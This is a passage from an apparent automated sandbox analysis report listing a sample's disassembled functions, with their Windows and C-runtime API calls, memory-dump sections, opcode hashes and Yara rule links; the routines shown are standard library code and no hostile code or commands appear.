                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                                                                                              • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                                                              • API String ID: 834187326-2211150622
                                                                                                                                                                                                                                              • Opcode ID: 71f3a4d15ae88925df86da6fe0f9041972657cf643b69cb85cf944e416e20366
                                                                                                                                                                                                                                              • Instruction ID: 900114b538f0e56798655cd31d0cf3e567c8663a397d0c216e5539527c953818
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71f3a4d15ae88925df86da6fe0f9041972657cf643b69cb85cf944e416e20366
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF21B3B06101049FCB42DF58E480AA97FF4EB46789B14D195EC49EBB63CB30D903CB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF45D36 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • UnDecorator::UScore.LIBCMT ref: 6CF45D40
                                                                                                                                                                                                                                              • DName::DName.LIBCMT ref: 6CF45D4C
                                                                                                                                                                                                                                                • Part of subcall function 6CF43B3B: DName::doPchar.LIBCMT ref: 6CF43B6C
                                                                                                                                                                                                                                              • UnDecorator::getScopedName.LIBCMT ref: 6CF45D8B
                                                                                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 6CF45D95
                                                                                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 6CF45DA4
                                                                                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 6CF45DB0
                                                                                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 6CF45DBD
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                                                                                              • String ID: void
                                                                                                                                                                                                                                              • API String ID: 1480779885-3531332078
                                                                                                                                                                                                                                              • Opcode ID: d9feab603d73c01e80b0cf333e2f714dfe0e11ca971f3e7d08919d48a2d6c5c9
                                                                                                                                                                                                                                              • Instruction ID: 1896282963675d9e8b094f0662e9784d8c6eb2922837acf189535f2fca9a2ae8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9feab603d73c01e80b0cf333e2f714dfe0e11ca971f3e7d08919d48a2d6c5c9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE11A5B1904208AFD709EB68C898BED7FB49F11305F00C098D4559B792DB70AA4ECB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEFC850 Relevance: 13.8, APIs: 9, Instructions: 271COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFC88F
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEFC895
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEFC8A0
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEFC8D5
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFC8E1
                                                                                                                                                                                                                                              • std::tr1::_Xweak.LIBCPMT ref: 6CEFCB1C
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFCB39
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFCB49
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEFCB4F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1774866819-0
                                                                                                                                                                                                                                              • Opcode ID: 7e213b80536f8c8af55af22e479c62f6d6eed446389ed006a78e41eb78c83578
                                                                                                                                                                                                                                              • Instruction ID: 160598855cc0236269838e31f11a0c52f483789f6ad102992f95f8b1ea519372
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e213b80536f8c8af55af22e479c62f6d6eed446389ed006a78e41eb78c83578
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3CB13B756006099FCB24DF98C884EEAB7F5BF8D310F25856CE506ABB91DA34F841CB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF3F10 Relevance: 13.7, APIs: 9, Instructions: 201COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEF3F7B
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF3F8D
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF3FB7
                                                                                                                                                                                                                                              • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEF3FD0
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF40C9
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF4105
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF4123
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF4157
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF4168
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$ArrayClearSafe$Bound$DestroyElementInit
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 758290628-0
                                                                                                                                                                                                                                              • Opcode ID: 4014adbcfe45d6580f0cfc244625a6d275cac186df2fc6779ffe1e57660df2e5
                                                                                                                                                                                                                                              • Instruction ID: ef3fd61e2a8985eba9416eb77eaf323e84f3382d576a4eda408eef98e485371b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4014adbcfe45d6580f0cfc244625a6d275cac186df2fc6779ffe1e57660df2e5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5717A762093819FC700DF68C88095BBBF8BB99308F644A6DF2A587650C735E946CB52
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEDFC30 Relevance: 13.7, APIs: 9, Instructions: 154fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,FF0C5935), ref: 6CEDFC98
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,FF0C5935), ref: 6CEDFCAD
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,FF0C5935), ref: 6CEDFCB7
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,FF0C5935), ref: 6CEDFCBA
                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,FF0C5935), ref: 6CEDFD01
                                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,FF0C5935), ref: 6CEDFD14
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000,FF0C5935), ref: 6CEDFD2A
                                                                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,FF0C5935), ref: 6CEDFD6B
                                                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,FF0C5935), ref: 6CEDFD98
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1303881157-0
                                                                                                                                                                                                                                              • Opcode ID: 9215f945507ac422d8207fb626d0c02712135fec37ff434c9d9ad58b903ce30c
                                                                                                                                                                                                                                              • Instruction ID: 9c9ee4d74d53d3a11d8218ac6827f2596a06ddda21173d17ded02bff9c78aa47
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9215f945507ac422d8207fb626d0c02712135fec37ff434c9d9ad58b903ce30c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E551E4B1A04301ABDB00CF34D884B567BB4AB49368F3A8658ED15CF785D774E8178BA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF342B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CF342DD
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF390ED
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: __CxxThrowException@8.LIBCMT ref: 6CF39102
                                                                                                                                                                                                                                                • Part of subcall function 6CF390D8: std::exception::exception.LIBCMT ref: 6CF39113
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF34363
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF34381
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF343E6
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF34453
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CF34474
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                                                                                                                              • API String ID: 4034224661-3788999226
                                                                                                                                                                                                                                              • Opcode ID: f6166739de67371f0eadab4f12df56d5c88e0e256172115bce5ccbed9fb5962b
                                                                                                                                                                                                                                              • Instruction ID: 76ab24d73f9e3b471188116b77291cb13284c64aed27df388b0f9b85a0441277
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6166739de67371f0eadab4f12df56d5c88e0e256172115bce5ccbed9fb5962b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D5184B17042065FC714CF78DC85D6BBBE5EBD4214F184E2DE84AC7744EA75E908C6A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF04B60 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 143COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                              • API String ID: 2168136238-4289949731
                                                                                                                                                                                                                                              • Opcode ID: c3b6c29f691cafbff7374167571690510b176f2662314c8467b1b36cbee25403
                                                                                                                                                                                                                                              • Instruction ID: cad303ccecf88e012820631823cd42d44d5739b33d892aabcbeaf6b5bc7ba49f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3b6c29f691cafbff7374167571690510b176f2662314c8467b1b36cbee25403
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6341D7733056109BD724CE1CE8A0E5EFBE9EBE5B14B604A1EF051C7E90CB61DC8593A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEFFEA Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID: RSDi
                                                                                                                                                                                                                                              • API String ID: 4225690600-559181253
                                                                                                                                                                                                                                              • Opcode ID: 9b7f2f22dbcccb50cbf6eaaa32489518328b09ebd5ff9e23cfe4b5e8f4826e13
                                                                                                                                                                                                                                              • Instruction ID: f0244f332f2ce56b06d02a5245c5cd3f11bfc3b685c49de9a8e51c9671cb7598
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b7f2f22dbcccb50cbf6eaaa32489518328b09ebd5ff9e23cfe4b5e8f4826e13
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48416DB4A016489FCB00CFA9C980A5EB7FAAF89308F308589E519DB755DB71EC42CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF0815 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID: RSUa
                                                                                                                                                                                                                                              • API String ID: 4225690600-2086061799
                                                                                                                                                                                                                                              • Opcode ID: bfc62e094fe13238e3ed20eb2b3d8e75545a82d7080bc72e4aaacd7361926b28
                                                                                                                                                                                                                                              • Instruction ID: 6a6f9bc2741c9a978ca690c289c964a9e90d2bf2d21474ef0b8ca5003ed7a517
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfc62e094fe13238e3ed20eb2b3d8e75545a82d7080bc72e4aaacd7361926b28
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63313BB0A016589FDB00CB69C884B5DB7B9AF99308F30858AE418E7751CB75D941CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF06F9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
